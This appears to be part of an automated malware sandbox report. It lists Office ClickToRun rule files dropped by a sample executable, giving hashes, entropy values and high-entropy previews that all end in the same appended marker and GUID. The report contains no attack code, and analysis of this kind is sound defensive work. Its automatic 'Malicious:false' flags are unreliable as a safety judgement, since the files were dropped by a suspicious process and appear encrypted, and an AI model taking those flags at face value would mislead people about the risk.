                                                                                                                                      MD5:8DA1A4B0BFDBE46F5D6200AD8AB78280
                                                                                                                                      SHA1:5A95A42A57E495659661D76546E7A46804B29B06
                                                                                                                                      SHA-256:EF3A90160898D913B0EC3D52A3B3475C3A490B027C2B9FD30EFED10BC2A8A431
                                                                                                                                      SHA-512:4F1C91AFBB1B8C9D471FB8DC67AA25B71AD9A1CFDB1C043F9E33225A5B87B84803F7507C4731D5949E5E8C4D2BEAC69EE1604B4360A50E18EA26ED436A08CC81
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?....1..(9.-....z..,....U`;T...N....f..r.W.....7..........zX.g..........m..s5...j...9A..$?m:@.C...pG...9.ui.iX[......0..l= N..n....G....N.,.@*&.|.v...@...T%.j....C.N..h..6.5...Dk(..c.f......bZ.8.|.P%.%..yX.i.&..8yVZn/.Q.v.....=aV.n.z..:...4.l......K...d.Z...c.D..i.."....g..tG.......X>.u._.%..`:............&x.i.j..=...l.5...a..-...N..h....8.....:.6....E.,z.(' ?9./1s.c7.Qr^ON.......J...w.p~*.....r,.g.+c..h;.t,.S...p.=x../.c.V}(3..T..3.....H....QV.!..j...p..vU..t......M._i.......M....w.p.Qz;x"D.....s.......L.?....C.m5$..-NY..p.pc...Z...x.Z.gg.....;k&5[.....;.9.e.H.>..0..=8...s..V1.........:x.gQ.g.........d...&Y..^..VF..a..s......S....'t.z..6...../w@r.;;.T..S.:....]...,..c.J,..t.(~....zu..{..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120661v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):745
                                                                                                                                      Entropy (8bit):7.69846366902982
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:C/dZToNYFMP97YDt+oVR1dfX4qMX6QKtKAFQvSYLXquukIcii9a:y2gMF7u+YNfon7KtivSYAbD
                                                                                                                                      MD5:3F89FC84898BC40B9CCE5A0271B9D7B1
                                                                                                                                      SHA1:8E669897FA6665CFC6545E72A3DDE2AB4D4CBDCD
                                                                                                                                      SHA-256:4353EB8BF0176ACCAF8F39A9FCF9AE437A8C16507DFA5D286A20F55B3F26F80F
                                                                                                                                      SHA-512:B11A2E4F033A2753958BB276CCE4211042A4BC41CC468DBD53597CE8540F451785A3D3AFD6041E6B4E37E1C5CA4E80212E16D8EE8F50D0D3C2F068B60D6A2F9B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?B....w...h......_=..U,kB..gp.:.....8..g....}...c...I.tw.<....t^Q.@....._1...@.....8....K.Am.1a..6..5...v...._.U...p.V2.....u7.^".+./.&.......^Ob.3.(...U._P..0$....^9...%.=d..!S...."...6..#.tTd...<....yW.w(..^I..m..uox>h..D.....]..........).?<e..1#z..^Io.g..hx0.*....Q.1>..f`...q.AH.....Z../eOL|.WB..u.1....(.C>.....w.>..wcN..l>.4..r.V..2*.p._.. ).....xbT....m...Q.eP...knA;;.H..-H......KE.i.xQ8%.m.#c....x..?.1|...|%". Z:....B.\nuM.d.W..;...". ^#C....d/.^.*_.....9.7:.B..m.G).t..,....h.w.b.#b....v.Oo.(.5.R$....+.p.k......M[Q..c..3.%.....v.%.t.-..y.n.C....f..'..y...XKd..w=!...l..m".k..%...i...wt..>I...O...y.....O.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120662v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):804
                                                                                                                                      Entropy (8bit):7.715186765450289
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YE1FBqL7I3Z5ILJntNIVeRhkiyXT1OPR2MjpETqbmrczFf6fwhqH3l21nukIciik:YuWL9teAYD1OZjpryriawhqH3lLbD
                                                                                                                                      MD5:74E1DADB7ED5D6AEA5EA7688D47E8B15
                                                                                                                                      SHA1:9E8FD9DCE37523D30F72493E99D91B7F0EEBA4F2
                                                                                                                                      SHA-256:18922B6D57E38156D511DFA98983608F9F7DF75F279EEBD2463B9B43B337EAC0
                                                                                                                                      SHA-512:5B08848569C6BF9E7AC8EC7DF144EC4EA9DF85DC0ECC96E325E16008A21B01620C8535BB4B3D8E13B026D6E11642422BAE33D1887C658BC1BE7986A483E60CF7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.Z....(..*.d...7..q...?.......GsL6.`.f.+..r>L.sF(1_.P.R..dLM..:3.....3).!.2pW}...e......j...*..A........V...L.%OY.&......... Y.6....KYC|.H:..R..f..Q.R.%'....1Y...J4..'.s.{.:...0Z(D..Z .m...{...R0O...\f...';o....y../..P.......+.....n...0.V>@..._.....w...7vI.,S(...Pq..>..\..:.......7...n....F..r...L./&...w.../b....t".p.R.D..2p.c.p:..0..U].^..}...8.5[..'.hW0..g].0...4BR0.......-g..........B"..L..<..L..h...C.....'..TnVF.....B4...*=>Z.......p'.^.l|..Q0.:_..OX.L...{..HI.! .rg...I....8.>`p.......9.....eC...q.*.v.cS'.oI...=/.......e.\<.....x..D.^cv... .-.|..<.}h9'..g.B..<m..H|....(.l..H...3D.vcp...w>.x#.j.L..6.9`I............B.:..X.IYj!#j..i.z......y.y.$.S..z...`Ne!..........s.<.h...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120663v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):761
                                                                                                                                      Entropy (8bit):7.676948002212063
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:t8dCol0CQ9sb79wXS60niRbam/eI9f9iNyj4ZYC3F1Elm1ilDm+cukIcii9a:t8Mcvos39OS60ipfwrV6lm1oDm+XbD
                                                                                                                                      MD5:D88E0FC5E8654DDF5E09EF952139394C
                                                                                                                                      SHA1:D9A3C315B9394DBB3BA51DD2F928B1B7969561DA
                                                                                                                                      SHA-256:47EBF988A5EE804CF065E799EE0A864BE2D71C3F64F2DA3B9F2D8245A1B6DFCE
                                                                                                                                      SHA-512:F3B8D63395D738845AD9F7DCA340EBF05FA0A4AF66AA89DCDD4FAFCE0D0F0CB6F4D4D01083F1CCF15649958D8059E023D9B57B4967BF87ABFF1BE35323A3E68C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?K._.....3.9l.^n....J.......U...}k...c5s$.0.]M....e..h..#...`G..).B..Ni.-,....0q...........^.;_.$.|._......e...x^r...u....Qx.d..[..D.........lsD...6.c.|.}....Ij......>ts..v3.z.p.%..q..N...&....i.....eq..e:F....{.Q..U.._G.I,k......4.og.u..I...T...>..OO(=...<..h...C....j..*...I6$.$....7.B\....*.:..|...J.F.2........i|...XY.9@gY.....K'X!..z.h..x..|\2[.......2...5.....iO.(..)Zxn4h.........y.:...M*.....DD1!i....B......(...K.5....&.G.`...[./n6.Q./T.._...6.is.]'u8....:.LEY...O.......U.P$...VW!..0-g....}.[c.A7.DG..Y.t.J.".|.L.......pC4... .Q.Y.0..dY.iO;/.........(4..Y&+......>aR.veA.....M.@e.y..Q^.U..:..TWey7.R?....:.V..+.\.;...._n_.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120664v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):836
                                                                                                                                      Entropy (8bit):7.755690316265011
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:mLxzr4Z1iGv95mBp5BaEkbpYcZeLaXb4khtAbD:8p86Glw3aEktLZiaXPaD
                                                                                                                                      MD5:B423EEBA513DC4FD5CA46F55E81090C6
                                                                                                                                      SHA1:DA8C60EE34F68D6A106949E3B855A19B2F185A7C
                                                                                                                                      SHA-256:AD137E807B547F4670CCFBAF3A11909333ADFAEC6E01B13D5FF28853FBF12D7B
                                                                                                                                      SHA-512:D3E6AA8C968C735A89E3A90C4848E3D9EC4E883F704564338E53F7432DAA272D505C3BF6345080212D6D3C9A4EDF40A6C968A4BE1E5FC3147044A64578ECDC68
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?9.F...)..._....1..rd2...x5.%.'..DI..RB.%.....S..{.{.1t42..BE+....;k...#....EX..u...R.@.D'.-.j.[.Jj.$U.#.W....x.t.....W...?/...|P....<Zp.b.D.I.-.C.\..=.s\FF.5`q.~.m.b.3*yw.....(..4..^..vJ.p..-.[.X.&...L%..i..(.M!.4e.DY`......-......<.......)/..%..<o[.J.y.Z.4...wR.Ya... ........`X.....Au.W.\.L....f.q....:..D..4N!.j..AIYp.~.u..2@.}..9RA.X.I.=.(Qt5.K6e.&u;..a&...{Q...sg.O....-..L..._......5>.A~.C..p.Xd2...]..8x....]........Q.r.C}....9.b.W..DF......P\w..*..-..j.:&u....W..6<....l..:3....n`....pb"})..m.G.aG.<........Y......-.......E..h.2..7.....$.'.T`.....K...>[..H.=`.'.+....J./...a.t.u...|...@].V./MU..b.2.!I$Y..E....x...Dh ...O&.onsT.1..-Y>..d.,+.. %.ib.FJ..4.`.<<M.......>\..D.i.......6P5.7.....+.=....B6e....[.r.9stp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120665v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):741
                                                                                                                                      Entropy (8bit):7.710378310689512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:5J06qQP7T7zB4p/F07z9Oc2hlCKNq8VmZV/I7O/06KDAESL2Jrx+79ietf8jA3Tf:hh7rB4pe7z972zCKNHVu5r/06yAJ2R8l
                                                                                                                                      MD5:071F862BE593560594F818484306A4F3
                                                                                                                                      SHA1:8911BCEC241E52C683FD7BB1ED6C7BBF7B708C33
                                                                                                                                      SHA-256:6AA6C47FFE724B386AF9E0376D48564715D316A42EBE99CDB1004DDCF7CC34B2
                                                                                                                                      SHA-512:E5FE19CABAB5673662939A3C817CC07E44AEE2EF49467F10938FBBCEDCE00910C378EA5ECE6A60265516206747BF2323DA9A099585A155F982A00DAA29869CCA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?;............P.X..C....w.........K..Hw..:.1...,..3N..7..#S=........*.$jk.r....U).....N.L,...Z=.B...m%"nmE..4'...~..M3..."1dZ..T..%...'..`..=.`.>.v.87...kr[.!'/..>...>.3..M.fD'f.,..9e...K.G.0..Q7=.W...V(l?.._..2m'V.$..v-l?...NH..@.{.?.c.}....Z(~.=.rTig..D.Xc.U...[L.../:R9.G7v........(..y..B|.M...z.o.5p..M./B.......L$b.0..][.^....&.Jr;.S.2..T..).....$d?....{...P..=.G...FZ. r..,.. ..v:....-.j...t.+4.;..Er=.O.8.Y....gp....m.r ....#.7.J..E...8@..K0.&+.....h>q...p...U.........55.so3m...-..e..,..).=(...$...[..-.#..y..D..L.a.7...q.e..^A.{*hV....(n...m:..P.2...n..2L.9...hgX.&...b.zv./.H.4..).......9....p-...3V........e$..u..;~[(.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120666v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):808
                                                                                                                                      Entropy (8bit):7.764177360134928
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:p+ETfGV0jbmGrcmrsUuIe11PL5fwqyGcyxVzlPp6ikpIov/zCWVb2egvi2NDukIX:JL3mGY+u955fwQcyPRkpIov7C6K6XbD
                                                                                                                                      MD5:CEE69FDF6D17E50C56C1CD55E1306E6A
                                                                                                                                      SHA1:14209CDE64B8D9CAD03F8696E1203CEDB2E30E29
                                                                                                                                      SHA-256:066A3D2D7111655776A2FA3061772CC738663F3DA2233EFDDE2C779FD4EE8EFC
                                                                                                                                      SHA-512:5EC1BF5A72143AA5C880F451F1B8A22BC55A2D50BC0DBBE25AD63A086EFC40D17B204DAA0AB4AD897966ADCA97A8996839A47672D521EE323145BB9BFD9969E1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...B...}.&.1.ib....T.LY.....E.^*Z.+<.....j....f.+..^.}\2....R!en.'.....r.^.A..N~..0.q.\.Z....<.Fa..Oh..c.......'..5c.....*.!.O.l_u!q.S..IVr....b....\Z#.......VO...e.5[q..D.7._.}.'g.Ya..I...2l..(..%...&..r.$5.}.n0u)..m.%=.L.D$..+y$...N...G..e,....v.e^)!V_1../..W.hmM4J("&.......T?..".....v..)....YR...ZV..j...)8..]..*.{..8..+.C5....6s42.+..q..o...\..^........@/.....+.....b.....5W.EN.....n........5.'.........@(_W=.p9tP.R......s.K..KM.:.".G1b..._8..z...mr.....fj.......SLw.F...............z)FG.6......*.[U.. 6.#..b.....uYF..B|.T:..b..5..R}.35m../...<...{.~..1.,...=..#>.'x....)....~..qZQ......C...[xp.H..M.7..Qs.Q.....l7J..O?..HW.....a..nq2G.r].j...<....&3...-...]....on....}..f....]tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120667v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):742
                                                                                                                                      Entropy (8bit):7.701008250590206
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:ZI0OrZ7O32zR4dHmRynf9a6NCD1fwnglsvsWmax0Klth3YiFwJR0/Jd37uukIciD:SU32oHm846NC+ngl8EKlzoGP/rFbD
                                                                                                                                      MD5:DDEDC7F9B849CA5C97894B279D75BA68
                                                                                                                                      SHA1:2DA2F820D9E045F8F044A922B2D366144758ADAC
                                                                                                                                      SHA-256:3F4AAA58DB87FDBCCE49526FEF81B67BA7C032C97972DFEE1135A0915A4C3D52
                                                                                                                                      SHA-512:11A3630ACF4C56301468749B4810F94F70E7B1902635E0C042D8BE1929F0DCBE6C12D63C13E9727E841B95055A872995B2E0A8D0DC6B1341868D3FBCC5BAA523
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?h.>t..1...m....Xh..Mq6.....].N.27...N..@.b7hpp?....~....X0..h.d.....+&...=..%PO...|..k....8..7./.-.,S.~.....SZ.......c|)...,H...BF$....l...,........F..{t.a..6....kQ....#..H0.....6,.f..~...Z...@Y.>....M...t.F....(......Z.^.A.#qbK.4..[...f...V..X.....K.'.H.&..c.|..&*76t.9@tj.i7..%..K..k...y..?.;..3.LV.....w..D.....<_j........e...J....{..zb..rL..U.rUD..Ax...}.q..D...P.q(.8=..A.tz$n_T~E...8.. lI..F(.....L.B.@..0..0U.>..@n....Q.j'..=.EI....3...gt_._...k......S....-..\v....w|..u...g.%..E(....h...S.u.As+.iQ.1.....C.......^o............(.../../\v.h..x.......bL7.A.5.a.......P/..O$.O..z..9-c......Mi..i.. joQ...?.....n=Z......T9@..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120668v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):803
                                                                                                                                      Entropy (8bit):7.7360470127550585
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:T7sj83xkkKP+5HGDf7UQY2vm0JvXIacvj0lNqwntZbD:Ej0K+8tbvm0pHcvj0lAwtZD
                                                                                                                                      MD5:6AC93A4E38F07CB1453DC18A7954F068
                                                                                                                                      SHA1:B8C034268778F2A814245C77BC5C39B330FD52B1
                                                                                                                                      SHA-256:E0889BBE02AF30A8B883A5286CF5E7B3529A15D537D16FB145121D0912B3A945
                                                                                                                                      SHA-512:9AA8302549C8D189F8EBF06ABB0F8DCE0E856FA0FA7AF2F5DDA4DFBE64EE92E188EB6B7D307DEA2125779206BA193694679F253DB78B53C2401EFF26767F1AD1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?b...H...3.a%..Ia....g.........AL3A.:]..%..Nv.9&b...oD.. ...l..~.J.@....u..Z&.......E.Gq...x6..5..V..n.b.N.|...............uv.^.Q...;..z...=`....~.6.vhMHu....^.+/...].............D......j..>.J..=W:.Rr.n-`.....vP\W.c8^...8.l.....O.>vz.7P....E...+...k.....D.X..^WY.G..=T.I8.~..\.m......~.........t....k..`.....5.`.Wk1..#.9..$8.(..KN....T.......f.Y....D..'.P......G.LZJ....v.P..L...>. 3b.1._.j...f...^......l.....'nV..w-....2o.6.<.....A.O.1*....G.........-&AUz....*<D.to...g............p*Fl&..*i./(.9i...S.o..h....si.{Hk...=.e..=.:C....3....z..I....y...........8.....'7.9....v./M......@5....Y...A..........g..4..A.N.......W......A.wo.r........0.Pw7..fJ....._(7.....9c......&`..rketp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120669v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):750
                                                                                                                                      Entropy (8bit):7.682422345109564
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:2bOCiNWvIzy5fiAioO7CCPd6U1zuXAw8lJPWUguTSS1z7QwFNOmukIcii9a:Zi5attfPp5w8l1JgCpcbD
                                                                                                                                      MD5:7B90691418632C99509CA91D438BB30B
                                                                                                                                      SHA1:7D3A4686A90308CFB9C207DE1E94FB17B02491C8
                                                                                                                                      SHA-256:D7E1EB2B78BA1B63DCFA79DB71B9E164A34AA42B8E6F37AACA29C637067A435F
                                                                                                                                      SHA-512:7CA620845EACD24065F193DED8FB58DA3442FC689EC1B6E1B7504348B02CE9DFE716F9E2A033475AEF88E715A48B479B290B2A353FB9E0A65933B3E7201C1206
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..c%........."H...M.ML.....i.j.....g........$O..........Xm..`.0..u...o.j...[....}...J.W..].O.H:.CU(Q.\E.^+U..@...^....-./|.....vf.e......^+.o........mr....]+|.....<.........>.....y..........9.e....fkQC.Q..?!kD..?C\^.EBV,..Z.KNW.@.<.M...H}.3..z,.-..Y.Z.~.$.....U.-_..t..S.<M.......&i.ZHa...+...\"._<-.&."j...H...]0..u..2..IDr.Ov..0lt..(..&i...K.{x.K...#.(.......-w..;.O1.>ayie.p`.... ..J-k..nSx@....A...A.[:...#......8.^c...g....t..h..l.|,3.K...*s.R4ZAP..f.u.l.E..1...L...$..0fTr..s...'......x..H5.;.>......Qe .....2..i.@e.B..E..^v8.o6..Bh R.}Q..6..B..!.............z.:h...|8.......`..v.]H...9wf.XL....~..-&Y...x.u.B.N..p.\|d.J`..|tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120670v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):806
                                                                                                                                      Entropy (8bit):7.732696871508342
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:JoqHLiMR09rU1vEaXofuiB4kOBazca1hbMNtlug/78g68uLSukIcii9a:OqHLbS4FEsWuiiGc0oblug/A82bD
                                                                                                                                      MD5:3E0FD8530FB2FFCDEE80E5F9848CCE46
                                                                                                                                      SHA1:D1D8E7B5DCAB54C0C5814D67D19F38C51BC2FD7E
                                                                                                                                      SHA-256:5DD0718CA03E436111AC3D8AF196F753DA0C45D5307EEFFB5BBF45D09CF5AB64
                                                                                                                                      SHA-512:84A8D09B6892203EBDDC7F2040980C10CC943503A6F6E88A16A8D844C322282218CD0C1E3B161DF312D4638A1D6EB65EAC04F94BBD80EE671FBA907B0E8FEDE4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..0..O92.^.duC.y.%.:.b.I.....!..........'....z.....N.?....qc/Fp9.%.'.~.V.}P..R qq6R..D'S....+...B..SyI.f9...l.juD.p.h$Do!.g....L...$...y..N.5.....,J....Hk.9....f.L..\....<.....Q.(..`...`...".^.\.X.#.p...U.f(.A.......?...@....-.;.R2r.[..f..j..K.....m......;\...cG(.....D.*.j2Z........w...0..V%..v!..'K.#._...L.-....&...W9..P.......8o8.M`^../.~....#...B.X.}.8..(.NE..8........c./...2.&oV...o.5%H..Xg..Z..........<.(...s.......!;E.PNlZ.r..0?.b......"....s..i.CU.".mT..%..B.<.O...v......Y.##F.....$..X;R..e...{GE.#t...y..q.N...;..>..S|.'..0w..p.....8..\.h.Q.\.W...m..9..R|$e$O..r.d+3l.......vh...OS^.....O,Al......Cba.....b..e.......?...i.sLG..7O.7.....v.n...%F...yBr..V.<.8..o}...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120671v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):766
                                                                                                                                      Entropy (8bit):7.667943642284498
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:rSoGhLioiy6/w+i9qJ00zMZwuz2CuWcGAL+HVFpxGPuM9376xyAB7H3PRxukIciD:rSoLRz/oeIWO2oB1FTGGM93Orj3PgbD
                                                                                                                                      MD5:E84A2F21F503AB75C477027D049014A3
                                                                                                                                      SHA1:CFCFFA53F22F523272033EA461B33230C4D0FE3C
                                                                                                                                      SHA-256:CECD352281B79E3E23CEEAA574D7132B3E6BA8DC0A7C401E4F452C9E73923575
                                                                                                                                      SHA-512:5095F2D3AA7B9D9B61FD4F5D823FADB94E55ACBE641C74A7946909C626B17342B77586E91375460805EAF20EA8832EE502AE890CE081E9D1F1CE359A3F9A47D2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?F..7d!.+....WC.....s.Q..t?..$....y.)*.tp..)n....N.....|F.....lS.C.....KYfw.....1{.@{.c.k....#,.....h..Ax..4.X....1/..x...i-q...r.?..zEJ>.j*...Z.o..M.....3A..hX..../3....5.-....I.Q.i.s...*YBcH[...f....x.P..Wg..........D.F.w....*.^&.=..g.d@.._.......A..N..=O@..G=U..Q.^H...]......3....W.l..ME_G`.6..|..$.`S..`...u...r(t...(.......>p...........$z.Ev..h2%...[........o.w2w$...KcU.....).*.?Y..l$.K=...K...yV..Js.8.i|B.+..d.g"..P7S%x2....BF..L..;IM.K.7.@""ya..K%...P6q..%..`.U.}^.\...h...`yX..J.....B]....D..F.....M...8..a.....p.Z...1........2.#.$..T...R|y. ...5....\{.[.y9tl#...NW4....!...... .ZH.q`.9.,}Pj.=..#.Z...>..2..Z..;...8..;Z.l.V.Ay...M..*..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120672v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):809
                                                                                                                                      Entropy (8bit):7.705318207603885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TqWnpMy9mOCVrMoGVGmGqPNcnH46D7HOgVrJR6arXc8nQqEa3dpbqmWVSLWnukIX:tqhVO1rPyRHh76I3bdpzjPbD
                                                                                                                                      MD5:35ED1F9525D1FCFB0F7013DF6BAE9980
                                                                                                                                      SHA1:3D878BCDF65107ADF40AC0FB57E798B93A4E564A
                                                                                                                                      SHA-256:DE692E7BD1E8EFBE257CC3AF053ED10A3C97CAF32497D419820056A88F900B3B
                                                                                                                                      SHA-512:C80EE0BBC5ACCF261D37D607EAEDF3FDC3CA994FEAA23BAD8C9D5A6D6F3BE6078D577105922B908BC0AC992092B97134EDE14DC041C7AAD0BE60ED10269ADCEC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?>|.Fk6....,.F}7Vgo......%S....2..].(6..x;.O8..$.D.LC....X..6.?T....E...u....6!.%#.?.p...|jr.Bn.P&.UR#../.b...9a.,.P.7lL..n...0.....zD.....~..[*..+Y."...j...c@).8.V...`.Br..S....{~p..b.....*......:.%.Zf....G..Z62+B<....b. .=/..g...,.......h(.y..n.*&.^..U(K8.aAM.t..B.N..e.z.V.2.(...w....O.V.f.CJ&/G}T.2g3e/Nq.tP(...>.5.R.d..Kl...Z......Eh......#~=5P!.*/.|ef..S1'dHD'..I....ip..lG.;...ec..&...l.Z.o^..f...E........B....+.E~l:.C..m..JT&d.....#..bi..{..Y..@.....`t.....*..xj...K.e..4-Lb.9.M.0b..C.u.uP w..F......7M......Pj...<._...)..K9{........$....c0V.D+[2~Z.ozD...Q..]IG....|..h.Wc....p...Mf.v..P8.j.i.o..5.a..*BDL.Q...>d..*.......Zn.;.5.Z...=O.4I..7.6.!.`.J.H...<...HC.s(....BG.wgC.G].wm......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120673v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):761
                                                                                                                                      Entropy (8bit):7.646126230932507
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Atw5vjcWdMY4vdNsCTNC/yESAjzgjymv/+XyrcYo0iHniPTIKQyukIcii9a:Atw5rcWdENEvSd/cGciitbD
                                                                                                                                      MD5:37F69FD4587DEA006730ED73C8530231
                                                                                                                                      SHA1:BA5ADFC1264DB3B700FDACA19419CAB95D04ECE2
                                                                                                                                      SHA-256:12CBECF0A18B86E106A51C542AD07A4BE0FF731A8F7265F37A75A814DC82B773
                                                                                                                                      SHA-512:26B97010FA79B92F23AF36AC0CFBD75BB93161EA9D81466BA5E3C8D77AEAAFAFFE14BA4FAC12EEDE6D422F0719F38A0113D24767AC6818AE274E0371AB28988F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.6.7./...l!.F'..xTA......0h.2.....,.......L..f.W}.d.>L.c.5.M=.}..2?&~...!.....=..dA..f...H.xHs....../x.PgB..M.>&n.GZ./...>.B...hY..S.'..O...Z..B.\...T..../.).tc..b.....`..})..5.%^#.9.0g.:.....s..._...B.LsM....^...yJ.X`..1f..5E^...A.H.v......`W.U*...H..>.......5~.&.s....L.By.......g."..P...h<H.9....W-D...m..wf:.......:..q..D.....7...,....V..T....q.........2S.ws..O...H[.>...p.R........;...xH..n....p...g. .....M.RU.....[0..e.ys.S..?.^.^I_B.R.h..z..|.Qb...X.[.....t?...Qh.05...b.9.%~/[.h.@..b)..(........A...e.[.....qZ%....>.....X.ZX..y....6.A..gp6<...(.pt.l.$....=..h...>..d_$...i-..)..N.%l-"..dWoYL...k....~)Wk.Sd.`.'].l..l.....N.....^...ftp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120674v0.xml

